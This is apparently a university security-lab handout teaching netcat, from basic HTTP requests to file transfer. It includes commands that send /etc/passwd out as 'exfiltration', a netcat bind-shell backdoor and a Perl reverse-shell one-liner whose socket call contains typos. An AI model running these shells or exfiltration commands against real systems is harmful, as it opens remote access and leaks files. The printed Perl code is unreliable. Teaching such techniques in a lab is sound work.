´╗┐Netcat

Introduction

Netcat is described as the swiss army knife of TCP/IP. It does a lot, and knowing how to use it can be invaluable in security. It's not the optimal tool for many jobs, but it's a lot quicker to use than reinventing the wheel.

Setup

To start the lab clone the 354 repo (if you haven't) and run the script for the lab.

git clone https://github.com/cs354/CS-354.git
bash CS-354/labs/ncat.bash

Since ncat is a network tool we need a separate client to make connections to this server. Open up your student environment in a separate shell this will be your client. Keep both open side by side.

bash CS-354/student_environment.bash

Basic usage

Netcat's most simplistic function can be seen as a replacement to telnet. Try the following in the client:

$ nc www.northwestern.edu 80
GET / HTTP/1.1^M
Host: www.northwestern.edu^M
^M

Where it says ^M, you actually have to press control-v and then enter. This is to produce a carriage return as required by HTTP. Optionally, you can add more headers to your request:

$ nc www.northwestern.edu 80
GET / HTTP/1.1^M
Host: www.northwestern.edu^M
Accept: text/html;q=0.9,text/plain;q=0.8^M
User-Agent: Mozilla/5.0 (Unknown; en-us)^M
Accept-Language: en-us,en;q=0.5^M
^M

Another way to do this (which allows you to avoid pressing control-v all the time) is to pipe the output of some command to netcat. Here's an example:

$ ruby -e 'print "GET / HTTP/1.1\r\nHost: www.northwestern.edu\r\n\r\n"' | nc www.northwestern.edu 80

Common command line flags

Transferring files

One thing you might come across is a host you can access, but it's hard to get files onto their machine. Netcat can easily transfer files for you. On the machine that you want to receive the file (we'll use the student env container for this as if we are exfiltrating data from a server)

$ nc -vv -l -p 3000 > file

And on the machine from which you want to send the file (the other shell):

$ nc -vv hostname 3000 < /etc/passwd

Replace hostname with cs354-local (or cs354-NETID on vicious).

These simple commands just shovel the contents of a file over a TCP/IP connection. If you try this, note that in many cases these transfers will be filtered by a firewall. Try transfering a file from a machine in the Wilkinson lab to hamsa.

Creatin a simpleg backdoor

Netcat has the ability to execute programs when it receives a connection. This feature can be used to easily create a back door to a machine. (On the server)

$ nc -l -p 3000 -e /bin/sh

And now from your student environment (replace ncat-local with ncat-NETID if on vicious):

$ nc ncat-local 3000

Then try tying 'ls' or anything other command.

However, the -e flag has been deprecated in more recent versions of netcat (But we've made sure it's available for this lab). You can emulate this behavior with something like the following in perl, though it's not as quiet:

$client> nc -nvlp 3000
$server> perl -e 'use Socket;$i="cs354-local";$p=3000;socket(S,PFTREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Here's a great compilation of reverse shells in various languages, note all of them use netcat as the listener and whatever language is available on the host to reach out to the netcat listener. reverse-shell-cheat-sheet/

Additional

There is a lot that you can do with netcat. A short tutorial doesn't quite do it justice. If you have time, it would be good to read through the man page (man netcat) or to search online for things to try with it.

Classwork

Show that you can successfully download the webpage www.google.com. Transfer an arbitrary file using netcat. Show that you can crete a netcat backdoor and demonstrate an understanding of netcat's usefulness as a TCP client and server.